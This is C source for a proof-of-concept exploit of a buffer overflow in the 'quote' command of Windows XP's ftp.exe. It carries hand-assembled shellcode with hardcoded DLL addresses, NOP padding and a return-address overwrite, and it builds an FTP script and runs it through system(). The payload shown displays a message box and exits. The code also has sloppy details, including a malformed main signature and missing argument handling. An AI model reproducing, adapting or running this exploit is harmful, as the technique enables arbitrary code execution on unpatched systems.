/* DSR-FTP_exp.c (Windows XP Pro + sp1)
 *
 *
 * ---------------------------------------------------
 * Dtors Security Research (DSR)
 * Code by: Rave
 * Mail: rave@dtors.net
 * ---------------------------------------------------
 *
 *
 *	  ---[ FTP.exe for windows exploiter ]---
 *
 * Microsoft offers 100's of fixes these days but the odd thing is 
 * that they never fixed this buffer overflow.
 *
 * In april of this year (200) "aT4r InsaN3"reported this bug on insecure.org 
 *
 *
 * (QUOTE:)
 *
 * There is a Buffer overflow in the raw quote command in the Microsoft Windows 
 * XP ftp.exe 
 *
 *
 * just type: 
 *
 *
 * quote AAAAAAAAA....[517 chars]...AAAAAAAAAAAA 
 * ftp.exe will crash 
 *
 *
 * This bug was never exploited so that was my quest.
 *
 * If the adresses of 
 * 
 * MessageBoxA (user32.dll)
 * exit        (msvcrt.dll)
 *
 * are not the adresses of your distrobution, find the correct ones :p
 *
 * http://www.tripbit.org/advisories/TA-240403.txt
 */ 


#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;errno.h&gt;
#include &lt;windows.h&gt;
#include &lt;winbase.h&gt;
#define NOP 0x90 // &lt;-- our padding exists from NOP'S
#define PAD_SIZE 511
#define ret 0x006f261
#define MSG_ADR "\xB2\x11\xD3\x77"
#define exit_ADR "\xdc\x7a\xc0\x77"


#define EIP "\x61\xf2\x06\x00" 

char shellcode[] =
  
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
"\x90\x90\x90"
"\x8B\xEC"
"\x55"
"\x8B\xEC"

"\x33\xFF"
"\x57"


"\x68\x2D\x2D\x20\x2D"   
"\x68\x6F\x78\x20\x5D"   
"\x68\x75\x72\x20\x42"   
"\x68\x64\x20\x59\x6F"   
"\x68\x30\x77\x4E\x33"   
"\x68\x2D\x2D\x5B\x20"   
"\x57"
"\x68\x72\x63\x68\x20"  
"\x68\x65\x73\x65\x61"  
"\x68\x74\x79\x20\x72"  
"\x68\x63\x75\x72\x69"  
"\x68\x73\x20\x73\x65"  
"\x68\x44\x74\x6F\x72"   
"\x8D\x55\xC8"      
"\x8D\x4D\xE5"      
"\xB8" MSG_ADR   // mov eax,MessageBoxA addr

"\x6A\x01"        
"\x52"        
"\x51"        
"\x57"
"\xFF\xD0"        
"\x35\x01\x01\x01\x01"   
"\x50"         
"\xB8" exit_ADR   // mov eax,exit addr
"\xFF\xD0"        
"\x33\xC0"
"\x5f"
"\x5e"
"\x5b";        


char *serv;
char *user;
char *passwd;
int port;

int main(int argc,char **argv[])
{
FILE *fd;
char buffer[900];
int i;

	if (argc!=5){
		fprintf(stdout,"\nFtp_exploit.exe usage &lt;server&gt; &lt;user&gt; &lt;passwd&gt; &lt;port&gt;\n",argv[0]);
	}

serv=argv[1];
user=argv[2];
passwd=argv[3];
port=atoi(argv[4]);

fprintf(stdout,"\n---------------------------------------------------\n");
fprintf(stdout,"Dtors Security Research (DSR) \n");
fprintf(stdout,"Exploit Code by: Rave\n");
fprintf(stdout,"Mail: rave@dtors.net\n");
fprintf(stdout,"---------------------------------------------------\n");
fprintf(stdout,"Shellcode located at: 0x%x\n",ret);
//
fd=fopen("exploit","a+");
if (fd==NULL ){ 
	perror("error in opening exploit file");
}

fprintf(fd,"open %s %d\n",serv,port);
fprintf(fd,"%s\n",user);


memset(buffer,'\0',900);
memcpy(buffer,shellcode,strlen(shellcode));

for (i=strlen(shellcode) ;i &lt; PAD_SIZE;i++)
buffer[i]=0x41;




fprintf(fd,"\nquote quote site %s%s\n",buffer,EIP);

fclose(fd);
system("ftp -s:exploit");
remove("exploit");


 



		

}</PRE></BODY></HTML>